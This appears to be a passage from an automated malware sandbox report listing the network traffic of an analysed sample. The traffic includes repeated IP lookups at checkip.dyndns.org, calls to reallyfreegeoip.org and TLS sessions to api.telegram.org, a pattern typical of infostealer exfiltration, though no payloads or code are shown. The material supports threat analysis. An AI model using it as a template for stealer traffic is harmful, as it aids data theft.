Jan 10, 2025 15:33:52.874952078 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:52.875242949 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:52.880079031 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:53.031411886 CET  80           49719      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:53.033211946 CET  49721        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:53.033246040 CET  443          49721      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:53.033337116 CET  49721        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:53.033569098 CET  49721        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:53.033581972 CET  443          49721      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:53.084927082 CET  49719        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:53.517033100 CET  443          49721      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:53.519943953 CET  49721        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:53.519973040 CET  443          49721      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:53.550580978 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:53.559459925 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:53.564407110 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:53.675117016 CET  443          49721      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:53.675184965 CET  443          49721      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:53.675265074 CET  49721        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:53.675703049 CET  49721        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:53.725528002 CET  49719        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:53.730541945 CET  80           49719      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:53.730618954 CET  49719        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:53.733732939 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:53.733773947 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:53.733937979 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:53.734478951 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:53.734489918 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:53.770607948 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:53.819334984 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:54.351469040 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:54.351712942 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:54.396953106 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:54.396970987 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:54.397418976 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:54.419702053 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:54.463325977 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:54.590723038 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:54.590913057 CET  443          49722      149.154.167.220  192.168.2.5
Jan 10, 2025 15:33:54.590965033 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:54.595062017 CET  49722        443        192.168.2.5      149.154.167.220
Jan 10, 2025 15:33:54.782776117 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:54.782819986 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:54.782896996 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:54.794574022 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:54.794593096 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.248255968 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.248333931 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.250703096 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.250729084 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.251076937 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.303690910 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.304953098 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.347358942 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.410793066 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.410883904 CET  443          49725      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.410967112 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.413858891 CET  49725        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.436769962 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:55.441678047 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:55.644865990 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:55.647098064 CET  49732        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.647134066 CET  443          49732      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.647277117 CET  49732        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.647749901 CET  49732        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:55.647772074 CET  443          49732      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:55.694292068 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:56.128161907 CET  443          49732      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:56.138799906 CET  49732        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:56.138823032 CET  443          49732      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:56.258788109 CET  443          49732      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:56.258873940 CET  443          49732      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:56.259221077 CET  49732        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:56.259474039 CET  49732        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:56.274946928 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:56.276123047 CET  49739        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:56.280051947 CET  80           49720      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:56.280167103 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:56.280896902 CET  80           49739      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:56.281672001 CET  49739        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:56.281752110 CET  49739        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:56.286572933 CET  80           49739      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:56.970197916 CET  80           49739      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:56.988794088 CET  49744        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:56.988810062 CET  443          49744      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:56.988926888 CET  49744        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:56.989202023 CET  49744        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:56.989214897 CET  443          49744      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:57.024547100 CET  49739        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:57.454296112 CET  443          49744      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:57.456614971 CET  49744        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:57.456660986 CET  443          49744      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:57.606683969 CET  443          49744      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:57.606745958 CET  443          49744      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:57.606805086 CET  49744        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:57.607325077 CET  49744        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:57.618185997 CET  49747        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:57.622987032 CET  80           49747      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:57.623249054 CET  49747        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:57.623442888 CET  49747        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:57.628258944 CET  80           49747      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:58.294287920 CET  80           49747      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:58.296241999 CET  49753        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:58.296282053 CET  443          49753      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:58.296358109 CET  49753        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:58.296730042 CET  49753        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:58.296741962 CET  443          49753      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:58.334955931 CET  49747        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:58.752116919 CET  443          49753      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:58.761621952 CET  49753        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:58.761648893 CET  443          49753      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:58.887145996 CET  443          49753      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:58.887206078 CET  443          49753      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:58.887289047 CET  49753        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:58.887907028 CET  49753        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:58.896861076 CET  49747        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:58.898256063 CET  49759        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:58.901854038 CET  80           49747      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:58.901923895 CET  49747        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:58.903106928 CET  80           49759      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:58.903196096 CET  49759        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:58.903275013 CET  49759        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:58.908103943 CET  80           49759      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:59.575700998 CET  80           49759      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:59.577435970 CET  49765        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:59.577471018 CET  443          49765      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:59.577575922 CET  49765        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:59.577842951 CET  49765        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:33:59.577864885 CET  443          49765      104.21.32.1      192.168.2.5
Jan 10, 2025 15:33:59.616262913 CET  49759        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.038464069 CET  443          49765      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:00.040147066 CET  49765        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:00.040178061 CET  443          49765      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:00.192403078 CET  443          49765      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:00.192467928 CET  443          49765      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:00.192533970 CET  49765        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:00.193116903 CET  49765        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:00.202548981 CET  49759        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.204173088 CET  49770        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.207473993 CET  80           49759      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:00.207629919 CET  49759        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.208990097 CET  80           49770      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:00.209065914 CET  49770        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.209162951 CET  49770        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.213947058 CET  80           49770      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:00.352793932 CET  49707        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:00.880506992 CET  80           49770      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:00.882004976 CET  49776        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:00.882065058 CET  443          49776      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:00.882172108 CET  49776        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:00.882462978 CET  49776        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:00.882484913 CET  443          49776      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:00.928750992 CET  49770        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:01.336038113 CET  443          49776      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:01.342271090 CET  49776        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:01.342284918 CET  443          49776      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:01.463751078 CET  443          49776      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:01.463813066 CET  443          49776      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:01.463953972 CET  49776        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:01.464525938 CET  49776        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:01.471889973 CET  49770        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:01.472697020 CET  49780        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:01.476895094 CET  80           49770      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:01.476968050 CET  49770        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:01.477471113 CET  80           49780      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:01.477643013 CET  49780        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:01.477643013 CET  49780        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:01.482409000 CET  80           49780      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:02.158644915 CET  80           49780      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:02.160203934 CET  49784        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:02.160247087 CET  443          49784      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:02.160314083 CET  49784        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:02.160638094 CET  49784        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:02.160651922 CET  443          49784      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:02.210010052 CET  49780        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:02.632091045 CET  443          49784      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:02.633639097 CET  49784        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:02.633675098 CET  443          49784      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:02.772960901 CET  443          49784      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:02.773027897 CET  443          49784      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:02.773089886 CET  49784        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:02.773550987 CET  49784        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:02.784543991 CET  49780        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:02.785425901 CET  49790        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:02.789562941 CET  80           49780      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:02.789674044 CET  49780        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:02.790345907 CET  80           49790      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:02.790421009 CET  49790        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:02.790523052 CET  49790        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:34:02.795284986 CET  80           49790      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:03.479990959 CET  80           49790      132.226.247.73   192.168.2.5
Jan 10, 2025 15:34:03.481539965 CET  49795        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:03.481576920 CET  443          49795      104.21.32.1      192.168.2.5
Jan 10, 2025 15:34:03.481659889 CET  49795        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:03.481906891 CET  49795        443        192.168.2.5      104.21.32.1
Jan 10, 2025 15:34:03.481921911 CET  443          49795      104.21.32.1      192.168.2.5
                                                                                                                Jan 10, 2025 15:34:03.522552967 CET4979080192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:03.966530085 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:03.968296051 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:03.968329906 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.125726938 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.125816107 CET44349795104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.125904083 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.126415968 CET49795443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.129048109 CET4979080192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.133994102 CET8049790132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.134764910 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.134782076 CET4979080192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.139568090 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.139647961 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.139734030 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:04.147289038 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.811778069 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.813015938 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.813054085 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.813150883 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.813397884 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:04.813417912 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:04.866267920 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:05.276787043 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.278651953 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:05.278683901 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.423652887 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.423984051 CET44349806104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.424192905 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:05.424683094 CET49806443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:34:05.462675095 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:05.463469982 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:05.463500977 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.463567019 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:05.463962078 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:05.463973999 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.467617989 CET8049801132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:34:05.467690945 CET4980180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:34:06.092937946 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.093086958 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.094536066 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.094542027 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.094877005 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.096501112 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.139322996 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.345060110 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.345151901 CET44349812149.154.167.220192.168.2.5
                                                                                                                Jan 10, 2025 15:34:06.345788956 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:06.348278046 CET49812443192.168.2.5149.154.167.220
                                                                                                                Jan 10, 2025 15:34:12.055591106 CET4973980192.168.2.5132.226.247.73
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 10, 2025 15:33:41.228461027 CET5311853192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 15:33:41.235352039 CET53531181.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:42.744076967 CET6054453192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 15:33:42.753000021 CET53605441.1.1.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:53.726283073 CET5144653192.168.2.51.1.1.1
                                                                                                                Jan 10, 2025 15:33:53.733021021 CET53514461.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:33:41.228461027 CET | 192.168.2.5 | 1.1.1.1 | 0x30a0 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.744076967 CET | 192.168.2.5 | 1.1.1.1 | 0x7be8 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:53.726283073 CET | 192.168.2.5 | 1.1.1.1 | 0xac54 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 15:33:41.235352039 CET | 1.1.1.1 | 192.168.2.5 | 0x30a0 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 15:33:41.235352039 CET | 1.1.1.1 | 192.168.2.5 | 0x30a0 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:41.235352039 CET | 1.1.1.1 | 192.168.2.5 | 0x30a0 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:41.235352039 CET | 1.1.1.1 | 192.168.2.5 | 0x30a0 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:41.235352039 CET | 1.1.1.1 | 192.168.2.5 | 0x30a0 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:41.235352039 CET | 1.1.1.1 | 192.168.2.5 | 0x30a0 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:42.753000021 CET | 1.1.1.1 | 192.168.2.5 | 0x7be8 | No error (0) | reallyfreegeoip.org | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:33:53.733021021 CET | 1.1.1.1 | 192.168.2.5 | 0xac54 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                • reallyfreegeoip.org
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:41.246402979 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
Jan 10, 2025 15:33:41.939254999 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:41 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:33:41.972153902 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
Jan 10, 2025 15:33:42.184575081 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:42 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:33:43.514060020 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
Jan 10, 2025 15:33:43.724380970 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:43 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:44.419333935 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
Jan 10, 2025 15:33:45.107078075 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49709 | 132.226.247.73 | 80 | 2684 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 15:33:45.756248951 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
Jan 10, 2025 15:33:46.461771965 CET | 273 | IN | HTTP/1.1 200 OK
